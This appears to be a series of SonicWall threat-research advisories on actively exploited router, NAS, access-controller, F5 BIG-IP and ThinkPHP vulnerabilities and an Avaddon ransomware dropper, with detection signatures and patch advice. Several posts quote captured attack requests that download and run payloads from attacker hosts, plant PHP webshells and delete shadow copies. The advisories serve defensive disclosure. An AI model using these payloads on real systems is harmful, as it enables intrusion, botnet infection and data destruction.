, , , , ,

Attackers actively targeting Tenda WiFi router vulnerability

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the  arbitrary remote code execution vulnerability reported in Tenda AC15 router. Tenda AC15 AC1900AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking life.

CVE-2020–10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version allows remote attackers to execute arbitrary system commands via the deviceName parameter. This vulnerability is due to improper validation of the input parameter deviceName and this value is directly passed to a doSystemCmd function, causing an arbitrary command execution.


In the below exploit request that was captured, the attacker passes the malicious shellcode through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it

When usb.sh is executed, it downloads more payloads from the attacker server and executes them one by one.

Trend Chart:


SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18


, , ,

Advantech WebAccess NMS Arbitrary File Upload Vulnerability is being exploited

Advantech WebAccess/NMS is a web browser-based software package for networking management systems (NMS). It is designed with SNMP and ICMP communication standards for managing all Ethernet-Enabled Advantech products and third-parties devices. NMS can bring users an easy-to-use platform to monitor and manage networking remotely. Advantech WebAccess/NMS platform runs on top of the Apache webserver

Vulnerability | CVE-2020-10621

One of the services provided by Advantech WebAccess NMS enables users to upload a config file to the server and then instructs devices to restore their configuration with this uploaded config file. The service is requested via an HTTP request which places the uploaded file and several parameters in the format of multipart/form-data. The request is handled in the class ConfigRestoreAction via the following Request-URI:


An arbitrary file upload vulnerability exists in the Advantech WebAccess NMS. This is due to the lack of sanitation on the "cfgfile" parameter in the ConfigRestoreAction class. When receiving the request submitted to the "ConfigRestoreAction.action" endpoint, the execute() method of the ConfigRestoreAction class is called to handle the request.  The input parameter "cfgfile" is not sanitized before applying it to create the destination file path in the application installation directory. The destination file path could point to any location on the NMS server, which leads to arbitrary file upload conditions.

In the below request, the attacker posts an HTTP request with a malicious file and crafted parameters to the vulnerable server.

POST /SCMS/web/access/ConfigRestoreAction.action?cfgfile=<crafted input> HTTP/1.1

A remote, unauthenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation could lead to arbitrary file upload and, in the worst case, code execution condition under the security context of the system.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15119 Advantech WebAccess ConfigRestoreAction Arbitrary File Upload

Affected Products:

Advantech WebAccess/NMS versions prior to 3.0.2 are affected by this vulnerability.


, , , ,

CVE-2020-5902: Hackers actively exploit critical Vulnerability in F5 BIG-IP


F5's BIG-IP is a product family comprises software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5's Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI for F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2020-5902

BIG-IP Web GUI is accessible over HTTPS on port 443/TCP via the following URL: https://<BIG-IP server>/tmui/login.jsp

A directory traversal vulnerability exists in the F5 BIG-IP product family. This is due to insufficient validation of the URI within the HTTP requests. By using a semicolon in URI, a remote attacker can bypass the access control policy set up on Apache and forward the malicious URI to the Tomcat backend server. When Tomcat normalizes the URI, any string followed by a semicolon will be ignored. The root cause of the vulnerability is how Apache and Tomcat parse the URL differently, allowing users to bypass the authentication and invoke JSP modules. Successful exploitation allows unauthenticated remote attackers to access the internal java binaries on the vulnerable server.

The following internal JSP files are wildly used to compromise:



We observe the below http exploit requests targeting F5 BIG-IP servers vulnerable to CVE-2020-5902.


A quick search on Shodan reveals more than 6000 BIG-IP servers exposed publicly over the internet. Over 2000 of those servers seem vulnerable to CVE-2020-5902.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15070 F5 BIG-IP TMUI Remote Command Execution

Affected Products:

BIG-IP versions 11.6.1 - 11.6.5, 12.1.0 - 12.1.5,  13.1.0 - 13.1.3, 14.1.0 - 14.1.2, 15.1.0 and 15.0.0 - 15.0.1 are affected by this vulnerability.

Find vendor advisory here


Attacker IP's:

, , , ,

Hackers actively targeting remote code execution vulnerability on ZyXEL devices

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication by using the weblogin.cgi program. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains OS command, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the below hits more often as attackers scan for the vulnerable devices. In the username parameter, it sends the command "ls," a vulnerable device will return without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker performs the below Http GET request which attempts to download a shell script to the "tmp" directory, execute the shell script "test.sh", and later remove the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on shodan shows few hundreds of the affected ZyXEL NAS devices exposed online.


Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates available for NAS products that reached end-of-support, users are advised not to leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.

Find vendor advisory here


Attacker IP's:





Fake image file containing Javascript leads to Avaddon ransomware

The SonicWall Capture Labs threat research team have observed reports of spam inviting people to view an "image" in which the email states they are present.  The "image", which in our case was named IMG148150.jpg.js is actually a file containing malicious Javascript downloader code.  Once executed, Avaddon ransomware is downloaded and run in the background.


Infection Cycle:


IMG148150.jpg.js contains the following script:


Upon running the script, sava.exe is downloaded from hxxp:// and executed.  It displays the following message on the desktop background:


The following command is run to remove shadow copies on the system:

wmic.exe SHADOWCOPY /nointeractive and vssadmin.exe Delete Shadows /All /Quiet


The following registry entry is made:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run update "%APPDATA%\Roaming\{malware file}.exe"


Files on the system are then encrypted by the malware and are given a .avdn extension.  431680-readme.html is copied into all directories containing encrypted files. 431680-readme.html contains the following page:


avaddonbotrxmuyl.onion leads to the following page hosted on the tOr network:


After entering the ID provided in the html page, the following page is presented asking for $500 USD in Bitcoin to be paid to 32rmhhgJaCDEaB2RGv3joCc5K75niYtxZ5:


The site provides a chat interface in order to communicate with the operators and possibly negotiate.  We tried to reach out to the operators using this interface but received no response:


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: BitsAdmin.N (Trojan)
  • GAV: Avaddon.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

, , , , ,

Linear eMerge E3 access controller actively being exploited

Linear eMerge E3:

Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation, and personal safety systems and devices. Nortek Security and Control LLC's Linear eMerge E3 is an access controller that specifies which doors a person can use to enter and exit designated places at specified times. It runs on embedded Linux Operating System and the system can be managed from a browser via embedded web server. These access systems are used for commercial, industrial, banking, medical, retail, hospitality, and other businesses where users need to secure their facilities.

Vulnerability | CVE-2019-7256:

A Command Injection vulnerability has been reported in eMerge E3-series access controller. This issue is triggered due to insufficient sanitizing of user-supplied inputs to a PHP function allowing arbitrary command execution with root privileges. A remote unauthenticated attacker can exploit this to execute arbitrary commands within the context of the application, via a crafted HTTP request.


SonicWall Capture Labs Threat Research team observe huge hits on our firewalls that attempt to exploit the command injection vulnerability with the below HTTP request.

Once the vulnerability is exploited successfully on the target, the following shell commands will be executed on the target system:

The above shell commands are used to download the malware and execute it on the exploited systems.

The malware then accepts commands from its C2 server to conduct various types of DoS attacks against any given target.


Linear eMerge Elite/Essential Firmware version 1.00-06


As per Applied Risk's research report, a total number of 2,375 Internet-accessible eMerge devices are listed by the Shodan search engine; 600 for eMerge50P and 1775 for eMerge E3.

A quick search on Shodan exposes over 2000 linear devices.

An attacker can leverage an OS command injection vulnerability to alter or corrupt a database, steal customer records,  launch a distributed denial of service (DDoS) attack or even compromise other parts of the hosting infrastructure. The resulting damage is determined by the user authorizations and security protections that the organization has in place. In addition, attackers may retain access to the systems even after an organization has detected and fixed the underlying vulnerability.

No patch available yet.
The exploitation is known to be easy, given the proof of concept code. The attack may be launched remotely and no form of authentication is required for exploitation.

In order to prevent this exploit, it may require blocking access to the vulnerable PHP script until a security patch is out or allow only a whitelist of permitted values.

After discovering that an OS command injection attack has taken place, it's critical to cut off access to the compromised systems from the internal networks.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14767 Linear eMerge Remote Code Execution

WAF: 9012 System Command Injection Variant 2

Heat Map:

Attackers seem to be actively targeting these devices as we see tens of thousands of hits every day, targeting over 100 countries with the most attacks being observed in the U.S.

Trend Chart:


We do not find these IP addresses associated with any specific threat actor and most of these are seen crawling the internet, looking for vulnerable services, attempting to brute force and exploit the IoT devices. A good amount of attacks originate from compromised devices like Webcam or DVR that indicates that it's infected with a Conficker or Mirai-like variant of malware.

, , ,

Large scan activity observed for Digital Video Recorder NVMS-9000

SonicWall Capture Labs Threat Research Team observed large unusual scan activity looking for DVR NVMS-9000-series no-name type network-attached devices.

                     Fig: Hits for the IPS signature 14610 in the last 30 days


The traffic with the shellcode is given below. It uses the hardcoded username\ password to authenticate and attempts to fork a reverse shell to redirect the traffic to a remote listener on port TCP 31337.


The vendor advisory is posted here where they recommend updating the firmware.

If you have NVMS-9000 DVR exposed to the web, check for any unusual activity and block all inbound access from the web.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14610 NVMS-9000 Digital Video Recorder Remote Code Execution

, , , ,

ThinkPHP Remote Code Execution (RCE) bug is actively being exploited

ThinkPHP is a web application development framework based on PHP, distributed under the Apache2 open-source license. It focuses on rapid development of enterprise projects and is very popular in China where over 40,000 servers run ThinkPHP.

Vulnerability Overview:

ThinkPHP has recently released a security update to fix an unauthenticated high risk remote code execution(RCE) vulnerability. This is due to insufficient validation of the controller name passed in the url, leading to possible getshell vulnerability without the forced routing option enabled.

ThinkPHP parses the url query parameters to retrieve the module, controller and the function. It then checks to see if there exists a class for the the controller name. If so, it instantiates an object of this class and executes the function passed in the url.

The url query given below gets parsed by using the separator character '/'. Ideally controller class should not take '\' in the name. Because of the existing bug, '\think\app' is parsed as controller class name and 'invokefunction' as the function. It then creates an instance of the controller class 'App' within 'think' and then calls the method 'invokefunction'. 'invokefunction' can take arbitrary function as its argument, allowing threat actors to perform remote code execution.


The same vulnerability allows remote code execution through another controller class 'Request' in ThinkPHP.  Request class can be instantiated with the url below allowing cache function to execute the arbitrary function provided as part of the url query.


This is due to framework’s insufficient validation on the controller name, allowing arbitrary remote code execution or even access to the server

ThinkPHP has fixed the vulnerability by having additional checks using regular expression.

Exploit Campaign:

SonicWall Threat Research Lab has observed various attempts to exploit the recently disclosed ThinkPHP RCE vulnerability. It seems to be adopted by threat actors immediately after public disclosure. This vulnerability is currently being exploited by different threat groups to install botnets and other malicious code on the servers running vulnerable versions of ThinkPHP.

Find below some of the URL's trying to exploit the ThinkPHP RCE vulnerability

    1. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://cnc.arm7plz.xyz/bins/set.x86 -O /tmp/.eSeAlg; chmod 777 /tmp/.eSeAlg; /tmp/.eSeAlg thinkphp
    2. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo'<?php eval($_POST[qazw]);?>' > result.php
    3. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'print("tj"." tj");
    4. index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start C:/12.exe
    5. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl
    6. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
    7. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl
    8. index.php?s=index/\think\app/invokefunction&function=assert&vars[0]=${@print(eval(phpinfo().fputs(fopen('lx.php','w'), Base64_decode('Q25sdVh1bjw/cGhwIEBldmFsKCRfUE9TVFsnbHgnXSk7Pz4='))))}


Upgrade to ThinkPHP version 5.0.23 or 5.1.31 to resolve the issue.
If you use a content management system that's based on ThinkPHP5, It is likely affected by this vulnerability.

Vendor advisory link: https://blog.thinkphp.cn/869075

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13955 ThinkPHP Remote Code Execution
  • IPS: 13965 ThinkPHP Remote Code Execution 2
  • WAF: 1689 ThinkPHP Remote Code Execution
, , , ,

Massive IOT attack targeting unpatched Netgear devices

SonicWall Threat Research Lab has recently spotted a massive IOT attack, attempting to exploit a remote code execution vulnerability in Netgear DGN series routers.  It seems to have started over the weekend and the detection rate has been spiking for the last few days. We observed over 100,000 attacks coming from different IP addresses to exploit ~7000 firewalls. 

Vulnerability |  NETGEAR DGN Unauthenticated Remote Command Execution:

The vulnerability is due to insufficient validation of the user input within the setup.cgi script. An attacker could exploit the vulnerability by sending a crafted HTTP request. Processing such request could allow a remote attacker to execute arbitrary commands with root privileges.

Additionally web server skips authentication checks for URLs containing the substring "currentsetting.htm". Attackers can leverage this vulnerability to bypass existing authentication. Then, "setup.cgi" page can even be exploited by unauthenticated remote attacker to execute arbitrary commands with root privileges

Netgear DGN1000 devices with firmware versions prior to and Netgear DGN2200 version 1 are affected by this vulnerabaility.


Attacker scans port 8080 and 80 by initiating a socket connection. If a connection is made, an exploit attempt is made.

Below is the http request sent to Netgear routers.

Basically this URL leverages the "syscmd" function of the "setup.cgi" script to execute arbitrary commands. In the example above the command being executed is "wget http://localhost/netgear.sh -O /var/tmp/netgear.sh; chmod 777 /var/temp/netgear.sh; /var/tmp/netgear.sh; /var/tmp/netgear.sh; rm -rf /var/tmp/netgear.sh". It downloads a malicious shell script to /var/tmp/,  changes the file properties to allow execution, executes the script and then forces the recursive removal of the directory. The output of the command is sent to the attacker in the resulting web page . And with currentsetting.htm=1 appended to the URL, unauthenticated remoter attacker can bypass authentication to execute the command

If the exploitation is successful, it is possible that the infected routers could be used as Bots or as Crypto Coin Mining Zombies

Trend Chart:

The below trend line shows how this vulnerability is being exploited in the wild


Heat Map:

This attack hit nearly 75 countries but most hits observed in United States and India.



Netgear has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products.

Upgrade the Netgear software to DGN1000 / DGN2200 v3 or higher.

Visit the NETGEAR Download Center to download the latest firmware for your Netgear product


Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS: 13632 NETGEAR DGN Devices Remote Command Execution 2
  • WAF: 9009 Unauthorized Remote File Access
  • WAF: 9012 System Command Injection Variant 2